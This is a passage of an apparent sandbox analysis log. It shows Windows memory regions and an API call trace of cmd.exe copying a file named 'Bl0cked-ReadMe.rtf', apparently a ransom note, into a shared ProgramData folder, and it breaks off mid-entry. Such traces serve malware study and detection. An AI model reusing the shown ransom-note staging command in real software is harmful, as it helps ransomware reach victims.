"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29498 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29499 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29500 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29830 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29831 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29832 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29833 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 29834 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 29835 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29836 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29837 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29838 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29839 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29840 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29841 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29842 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29843 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29844 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29845 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29846 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29847 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 29848 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 29849 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 29850 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 29851 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 29852 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 29853 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 685 os_tid = 0xe1c [0202.336] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fc5c | out: lpSystemTimeAsFileTime=0x30fc5c*(dwLowDateTime=0xad690a60, dwHighDateTime=0x1d440a9)) [0202.336] GetCurrentProcessId () returned 0xef0 [0202.336] GetCurrentThreadId () returned 0xe1c [0202.336] GetTickCount () returned 0x391b3 [0202.336] QueryPerformanceCounter (in: lpPerformanceCount=0x30fc54 | out: lpPerformanceCount=0x30fc54*=25912524457) returned 1 [0202.337] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.337] __set_app_type (_Type=0x1) [0202.337] __p__fmode () returned 0x76b331f4 [0202.337] __p__commode () returned 0x76b331fc [0202.337] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.337] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.337] GetCurrentThreadId () returned 0xe1c [0202.337] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x38 [0202.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.337] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.337] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.338] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.338] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fbec | out: phkResult=0x30fbec*=0x0) returned 0x2 [0202.338] VirtualQuery (in: lpAddress=0x30fc23, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.338] GetConsoleOutputCP () returned 0x1b5 [0202.338] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.338] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.338] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.339] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.339] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.339] GetEnvironmentStringsW () returned 0x4b0190* [0202.339] FreeEnvironmentStringsW (penv=0x4b0190) returned 1 [0202.339] GetEnvironmentStringsW () returned 0x4b0190* [0202.339] FreeEnvironmentStringsW (penv=0x4b0190) returned 1 [0202.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb5c | out: phkResult=0x30eb5c*=0x40) returned 0x0 [0202.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0xb8, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.339] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x0, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegCloseKey (hKey=0x40) returned 0x0 [0202.340] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb5c | out: phkResult=0x30eb5c*=0x40) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x0, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x9, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x9, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x9, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegCloseKey (hKey=0x40) returned 0x0 [0202.340] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.340] srand (_Seed=0x5b8863a4) [0202.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"" [0202.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"" [0202.340] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.341] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.341] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.341] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.341] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.341] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.341] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.341] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.341] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.341] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.341] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.341] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.341] GetEnvironmentStringsW () returned 0x4b22e0* [0202.341] FreeEnvironmentStringsW (penv=0x4b22e0) returned 1 [0202.341] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.341] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.341] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.341] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.341] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.341] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.341] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.341] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.341] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.341] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.341] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.341] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f928, lpFilePart=0x30f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f924*="Desktop") returned 0x18 [0202.341] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.342] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6a4 | out: lpFindFileData=0x30f6a4) returned 0x4b0020 [0202.342] FindClose (in: hFindFile=0x4b0020 | out: hFindFile=0x4b0020) returned 1 [0202.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f6a4 | out: lpFindFileData=0x30f6a4) returned 0x4b0020 [0202.342] FindClose (in: hFindFile=0x4b0020 | out: hFindFile=0x4b0020) returned 1 [0202.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f6a4 | out: lpFindFileData=0x30f6a4) returned 0x4b0020 [0202.342] FindClose (in: hFindFile=0x4b0020 | out: hFindFile=0x4b0020) returned 1 [0202.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.342] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.342] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.342] GetEnvironmentStringsW () returned 0x4b2b00* [0202.342] FreeEnvironmentStringsW (penv=0x4b2b00) returned 1 [0202.342] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.343] GetConsoleOutputCP () returned 0x1b5 [0202.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.343] GetUserDefaultLCID () returned 0x409 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa68, cchData=128 | out: lpLCData="0") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa68, cchData=128 | out: lpLCData="0") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa68, cchData=128 | out: lpLCData="1") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.344] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.345] GetConsoleTitleW (in: lpConsoleTitle=0x4a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.345] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.345] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.345] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.345] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.345] _wcsicmp (_String1="type", _String2=")") returned 75 [0202.345] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0202.345] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0202.345] _wcsicmp (_String1="IF", _String2="type") returned -11 [0202.346] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0202.346] _wcsicmp (_String1="REM", _String2="type") returned -2 [0202.346] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0202.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.349] GetFileType (hFile=0x7) returned 0x2 [0202.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0202.349] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f960 | out: lpMode=0x30f960) returned 1 [0202.349] _dup (_FileHandle=1) returned 3 [0202.350] _close (_FileHandle=1) returned 0 [0202.350] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0202.350] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0202.668] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0202.668] GetConsoleTitleW (in: lpConsoleTitle=0x30f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.668] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0202.668] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0202.668] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0202.668] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0202.669] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.669] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x30f2c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2c4) returned 0x4a0e80 [0202.669] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0202.669] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0202.669] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0202.669] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30e1d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0202.669] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0202.669] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.669] GetFileType (hFile=0x54) returned 0x1 [0202.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.670] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x30e228 | out: lpFileSizeHigh=0x30e228*=0x0) returned 0x1632 [0202.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.670] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.670] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.671] GetFileType (hFile=0x4c) returned 0x1 [0202.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.671] GetFileType (hFile=0x4c) returned 0x1 [0202.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.671] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, 